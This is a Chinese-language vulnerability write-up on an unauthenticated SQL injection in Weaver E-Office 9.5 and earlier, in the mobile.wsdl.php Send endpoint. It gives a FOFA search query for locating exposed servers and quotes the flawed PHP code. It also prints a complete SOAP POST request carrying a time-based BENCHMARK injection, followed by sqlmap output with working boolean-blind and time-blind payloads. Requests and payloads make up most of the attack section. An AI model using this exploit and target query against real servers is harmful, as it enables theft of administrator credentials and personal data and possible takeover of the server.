漏洞简介
泛微E-Office是一款标准化的协同 OA 办公软件,泛微协同办公产品系列成员之一,实行通用化产品设计,充分贴合企业管理需求,本着简洁易用、高效智能的原则,为企业快速打造移动化、无纸化、数字化的办公平台。泛微e-office mobile.wsdl.php 接口处存在SQL注入漏洞,未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息(例如管理员后台密码、站点用户个人信息)之外,攻击者甚至可以在高权限下向服务器写入命令,进一步获取服务器系统权限。
影响版本
e-office <=9.5
fofa语句
app="泛微-EOffice"
漏洞分析
webservice-json/mobile/mobile.wsdl.php 的 Send 业务逻辑如下
function Send( $fromNumber, $toNumber, $content, $fromID, $toID )
{
checkcurrentsession( );
$mobile = new MobileSms( );
$result = $mobile->Send( $fromNumber, $toNumber, $content, $fromID, $toID );
return $result;
}
$fromNumber, $toNumber, $content, $fromID, $toID 带入 Send 函数
public function Send( $from_no, $to_no, $content, $from_id = "", $to_id = "" )
{
global $connection;
global $_lang;
if ( !$this->outAllow )
{
$sql = "\r\n\t\t\t\t\tSELECT COUNT(MOBIL_NO) AS cnt FROM user \r\n\t\t\t\t\t\tWHERE MOBIL_NO='".$to_no."'";
$rs = exequery( $connection, $sql );
$row = mysql_fetch_array( $rs );
$to_no 被直接拼接进SQL语句后执行,无任何过滤校验,造成SQL注入漏洞。
漏洞复现
POST /webservice-json/mobile/mobile.wsdl.php HTTP/1.1
User-Agent: Apache-HttpClient/4.5.5 (Java/17.0.12)
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
SOAPAction: urn:MobileServicewsdl#Send
Content-Type: text/xml;charset=UTF-8
Host: eoffice.mrxn.net:8082
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:MobileServicewsdl">
<soapenv:Header/>
<soapenv:Body>
<urn:Send soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<fromNumber xsi:type="xsd:string">gero et</fromNumber>
<toNumber xsi:type="xsd:string">sonoras' AND 4400=BENCHMARK(5000000,MD5(0x686d4650))-- bbLS</toNumber>
<content xsi:type="xsd:string">quae divum incedo</content>
<fromID xsi:type="xsd:string">verrantque per auras</fromID>
<toID xsi:type="xsd:string">per auras</toID>
</urn:Send>
</soapenv:Body>
</soapenv:Envelope>

成功在延时 5 秒
sqlmap 结果如下
sqlmap identified the following injection point(s) with a total of 416 HTTP(s) requests:
---
Parameter: SOAP #1* ((custom) POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:MobileServicewsdl">
<soapenv:Header/>
<soapenv:Body>
<urn:Send soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<fromNumber xsi:type="xsd:string">gero et</fromNumber>
<toNumber xsi:type="xsd:string">sonoras' RLIKE (SELECT (CASE WHEN (8386=8386) THEN 0x736f6e6f726173 ELSE 0x28 END))-- OigS</toNumber>
<content xsi:type="xsd:string">quae divum incedo</content>
<fromID xsi:type="xsd:string">verrantque per auras</fromID>
<toID xsi:type="xsd:string">per auras</toID>
</urn:Send>
</soapenv:Body>
</soapenv:Envelope>
Type: time-based blind
Title: MySQL < 5.0.12 AND time-based blind (BENCHMARK)
Payload: <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:MobileServicewsdl">
<soapenv:Header/>
<soapenv:Body>
<urn:Send soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<fromNumber xsi:type="xsd:string">gero et</fromNumber>
<toNumber xsi:type="xsd:string">sonoras' AND 4400=BENCHMARK(5000000,MD5(0x686d4650))-- bbLS</toNumber>
<content xsi:type="xsd:string">quae divum incedo</content>
<fromID xsi:type="xsd:string">verrantque per auras</fromID>
<toID xsi:type="xsd:string">per auras</toID>
</urn:Send>
</soapenv:Body>
</soapenv:Envelope>
---

